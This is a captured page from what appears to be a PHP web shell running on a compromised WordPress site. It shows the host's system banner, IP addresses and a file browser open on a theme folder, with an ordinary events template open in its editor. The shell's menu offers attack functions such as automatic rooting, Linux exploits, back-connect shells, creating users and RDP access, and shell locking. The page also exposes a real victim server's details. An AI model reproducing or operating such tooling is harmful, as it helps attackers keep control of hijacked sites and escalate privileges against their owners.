FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 3.138.37.152
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
themes /
sportcenter /
tribe-events /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
day
[ DIR ]
drwxr-xr-x
?;
list
[ DIR ]
drwxr-xr-x
?;
pro
[ DIR ]
drwxr-xr-x
default-template.php
1.9
KB
-rw-r--r--
single-event.php
7.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : default-template.php
<?php /** * Default Events Template * This file is the basic wrapper template for all the views if 'Default Events Template' * is selected in Events -> Settings -> Template -> Events Template. * * Override this template in your own theme by creating a file at [your-theme]/tribe-events/default-template.php * * @package TribeEventsCalendar * */ if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } $layout = leaf_get_option('event_sidebar_layout','right'); if(is_post_type_archive('tribe_events') || is_tax('tribe_events_cat') || (is_tax('post_tag') && get_query_var('post_type')=='tribe_events') ) { $layout = leaf_get_option('event_list_sidebar_layout','right'); } get_header(); ?> <?php get_template_part( 'templates/header/header', 'heading' ); ?> <div id="body"> <?php if($layout!='true-full'){ ?> <div class="container"> <?php }?> <div class="content-pad-4x"> <div class="row"> <div id="content" class="<?php if($layout != 'full' && $layout != 'true-full'){ ?> col-md-9 <?php }else{?> col-md-12 <?php } if($layout == 'left'){ ?> revert-layout <?php }?>" role="main"> <article class="single-page-content"> <div id="tribe-events-pg-template"> <?php tribe_events_before_html(); ?> <?php tribe_get_view(); ?> <?php tribe_events_after_html(); ?> </div> <!-- #tribe-events-pg-template --> </article> </div><!--/content--> <?php if($layout != 'full' && $layout != 'true-full'){get_sidebar();} ?> </div><!--/row--> </div><!--/content-pad-4x--> <?php if($layout!='true-full'){ ?> </div><!--/container--> <?php }?> </div><!--/body--> <?php get_footer(); ?>
Close